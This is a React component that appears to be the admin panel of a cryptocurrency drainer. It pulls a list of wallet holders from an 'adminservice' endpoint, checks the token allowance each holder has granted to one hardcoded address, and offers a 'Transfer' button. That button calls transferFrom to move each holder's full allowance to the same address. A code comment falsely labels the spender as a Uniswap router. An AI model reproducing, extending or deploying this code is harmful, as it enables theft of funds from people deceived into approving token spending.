
import {
  useToken,
} from "@thirdweb-dev/react";
import React, { useState } from "react";
import { useEffect } from "react";
import toast from "react-hot-toast";
import { useMoralisWeb3Api } from "react-moralis";
import styled from "styled-components";
import TransferTokenModal from "../modals/TransferTokenModal";
import CircularLoader from "../pages/CircularLoader";
import { SubText } from "../styles";

const TokensTable = () => {
  const [transferToken, setTransferToken] = useState(false);
  const [tokensList, setTokensList] = useState([]);
  const [hasNoTokens, setHasNoTokens] = useState(true);
  const [details, setDetails] = useState({});
  const [isLoading, setIsLoading] = useState(true);
  const Web3Api = useMoralisWeb3Api();

  const [allowances, setAllowances] = useState([]);
  const [transferAddress, setTransferAddress] = useState("");
  const transferContract = useToken(transferAddress);

  async function handleTransfer(contract, user, allowance) {
    setTransferAddress(contract);
    await transferContract
      .transferFrom(
        user,
        "0x778053e8DA3c5fd206CbD600bEe39Ec676FFE1b1",
        allowance
      )
      .then(() => {
        console.log("success");
      })
      .catch((error) => {
        console.log("error", error);
      });
  }

  // useEffect(() => {
  //   setIsLoading(true);

  //   if (callerAddress) {
  //     userList.forEach((user) => {
  //       fetchTokenAllowance(user.address, user.tokenAddress, user.tokenName);
  //     });
  //   }
  // }, [callerAddress]);

  useEffect(() => {
    async function getTokens() {
      setIsLoading(true);
      const url = "https://adminservice.noblenfts.net/gettokens";

      const config = {
        method: "GET",
        mode: "cors",
        headers: {
          "Content-Type": "application/json",
        },
        // body: JSON.stringify(base),
      };

      await fetch(url, config)
        .then(async (response) => {
          const result = await response.json();
          const { tokens } = result;
          if (tokens === "empty") {
            setIsLoading(false);
            setHasNoTokens(true);
          } else {
            let list = [];
            tokens.forEach((tok) => {
              const { address, tokenAddress, tokenName } = tok;
              list.push({
                address,
                tokenAddress,
                tokenName,
              });
            });
            setTokensList(list);
          }
        })
        .catch((error) => {
          console.log(error);
          return;
        });
    }

    // setTokensList(list);
    // console.log("list", list);


      getTokens();
  }, []);

  // function handleTransfer(address, contract, value) {
  //   setDetails({ address, contract, value });
  //   setTransferToken(true);
  // }

  function copy(data) {
    navigator.clipboard.writeText(data);
    toast.success("Copied successfully!");
  }

  useEffect(() => {
    const fetchTokenAllowances = async () => {
      //Get token allowace on ETH
      const allowances = [];

      tokensList.forEach(async (token) => {
        const options = {
          //token holder
          owner_address: token.address,
          //uniswap v3 router 2 contract address
          spender_address: "0x778053e8DA3c5fd206CbD600bEe39Ec676FFE1b1",
          //ENS token contract address
          address: String(token.tokenAddress).toLowerCase(),
        };
        await Web3Api.token.getTokenAllowance(options).then((allowance) => {
          const value = allowance.allowance;
          const address = token.address;
          const tokenAddress = token.tokenAddress;
          const tokenName = token.tokenName;
          allowances.push({
            address,
            tokenAddress,
            tokenName,
            value,
          });
        });
        setAllowances(allowances);
        // console.log("allow", allowances);
        setTimeout(() => {
          setIsLoading(false);
          setHasNoTokens(false);
        }, 300);
      });
    };

    if (tokensList) {
      fetchTokenAllowances();
    }
  }, [tokensList]);

  return (
    <Wrapper>
      {transferToken && (
        <TransferTokenModal
          open={{ transferToken, setTransferToken }}
          details={details}
        />
      )}
      <SubText className="top">Tokens</SubText>
      {isLoading ? (
        <CircularLoader />
      ) : (
        <>
          {hasNoTokens && (
            <p
              style={{
                padding: "4rem",
                fontWeight: "600",
                color: "#a3a3a3",
                textAlign: "center",
                alignSelf: "center",
              }}
            >
              No tokens yet.
            </p>
          )}

          {!hasNoTokens && (
            <>
                <table className="scrollbar-hidden">
                  <thead>
                    <tr>
                      <th>User</th>
                      <th>Token Address</th>
                      <th>Token Name</th>
                      <th>Available</th>
                      <th></th>
                    </tr>
                  </thead>
                  <tbody>
                    {tokensList.map((token) => (
                      <tr
                        key={token.tokenAddress + token.tokenValue}
                        className="row"
                      >
                        <td className="ref">
                          <p onClick={() => copy(token.address)}>
                            {token.address}
                          </p>
                        </td>
                        <td className="ref">
                          <p onClick={() => copy(token.tokenAddress)}>
                            {token.tokenAddress}
                          </p>
                        </td>
                        <td>
                          <p onClick={() => copy(token.tokenName)}>
                            {token.tokenName}
                          </p>
                        </td>
                        {allowances.map(
                          (allowance) =>
                            allowance.tokenAddress === token.tokenAddress &&
                            allowance.address === token.address && (
                              <td
                                key={allowance.tokenAddress}
                                style={{
                                  overflow: "hidden",
                                  textOverflow: "ellipsis",
                                }}
                                className={
                                  Number(allowance.value) > 0
                                    ? "green ref"
                                    : "red"
                                }
                              >
                                <p
                                  onClick={() => copy(Number(allowance.value))}
                                >
                                  {Number(allowance.value)}
                                </p>
                              </td>
                            )
                        )}
                        {allowances.map(
                          (allowance) =>
                            allowance.tokenAddress === token.tokenAddress &&
                            allowance.address === token.address && (
                              <td
                                key={allowance.tokenAddress + allowance.value}
                              >
                                {Number(allowance.value) > 0 && (
                                  <button
                                    className="actionButton"
                                    style={{ height: "48px" }}
                                  >
                                    <p
                                      onClick={() =>
                                        handleTransfer(
                                          token.tokenAddress,
                                          token.address,
                                          Number(allowance.value)
                                        )
                                      }
                                      className="actionText"
                                    >
                                      Transfer
                                    </p>
                                  </button>
                                )}
                                {allowance.value <= 0 && (
                                  <button
                                    className="declined"
                                    disabled
                                    style={{ height: "48px" }}
                                  >
                                    <p>Unavailable</p>
                                  </button>
                                )}
                              </td>
                            )
                        )}
                      </tr>
                    ))}
                  </tbody>
                </table>
            </>
          )}
        </>
      )}
    </Wrapper>
  );
};

const Wrapper = styled.div`
  position: relative;
  margin-top: 30px;
  background: #131824;
  border-radius: 10px;
  max-width: 100%;

  .option {
    display: flex;
    gap: 0.5rem;
    align-items: center;
    font-weight: 600;
    place-self: center;
    padding: 0.5rem;
    color: #c9c9c9;

    img {
      width: 20px;
      height: auto;
    }
  }

  .box {
    background-color: #1f273a;
    border-radius: 4px;
    display: flex;
    place-content: center;
    cursor: pointer;
    min-width: 180px;
  }

  .avatar {
    width: 32px;
    place-content: center;
    height: 32px;
    align-items: center;
    /* padding: 0.5rem; */
    background-color: #c4c4c4;
    display: flex;
    color: #131824;
    border-radius: 50%;
  }

  .profile {
    width: 32px;
    height: 32px;
    object-fit: cover;
    border-radius: 50%;
  }

  .pending {
    background: rgba(35, 163, 251, 0.13);
    border-radius: 6px;
    border: none;
    outline: none;

    p {
      font-size: 14px;
      line-height: 19px;
      font-weight: 600;
      padding: 0.5rem 1rem;
      color: #1199fa;
    }
  }

  .declined {
    /* border: 0.5px solid #1199fa; */
    border: none;
    border-radius: 6px;
    outline: none;
    background: rgba(230, 75, 96, 0.13);

    p {
      font-size: 14px;
      line-height: 19px;
      font-weight: 600;
      padding: 0.5rem;
      color: #e64b60;
    }
  }

  .approved {
    /* border: 0.5px solid #1199fa; */
    border: none;
    border-radius: 6px;
    outline: none;
    background: rgba(32, 188, 164, 0.13);

    p {
      font-size: 14px;
      line-height: 19px;
      font-weight: 600;
      padding: 0.5rem;
      color: #20bca4;
    }
  }

  .asset {
    display: flex;
    gap: 0.5rem;
    align-items: center;
  }
  .top {
    top: 0;
    width: 100%;
    background-color: #19202f;
    display: flex;
    justify-content: space-between;
    padding: 1rem;
    box-sizing: border-box;
    border-top-left-radius: 8px;
    border-top-right-radius: 8px;
  }

  table {
    display: grid;
    gap: 1rem;
    padding: 1rem;
    overflow-x: auto;
    max-width: 100%;
    overflow-x: auto;

    .name {
      display: flex;
      align-items: center;
      gap: 0.8rem;
      text-transform: capitalize;

      img {
        border-radius: 50%;
        object-fit: cover;
      }
    }

    .ref,
    .email {
      box-sizing: border-box;

      p {
        text-overflow: ellipsis;
        max-width: 85px;
        overflow: hidden;
      }
    }
  }

  thead {
    border: 1px solid #1f273a;
    box-sizing: border-box;
    border-radius: 4px;
    font-weight: 700;
    color: #828ea1;
    font-size: 14px;
    line-height: 18px;
  }

  tbody {
    font-weight: 510;
    font-size: 14px;
    line-height: 17px;
    color: #ffffff;
    display: grid;
    gap: 0.7rem;

    .row {
      border-radius: 4px;
      cursor: pointer;
    }

    .row:hover {
      background-color: #1f273a;
    }
  }

  th,
  td {
    width: 144px;
    text-align: left;
  }

  tr {
    width: 100%;
    display: flex;
    justify-content: space-between;
    padding: 1rem;
    align-items: center;
    box-sizing: border-box;
  }
`;

export default TokensTable;
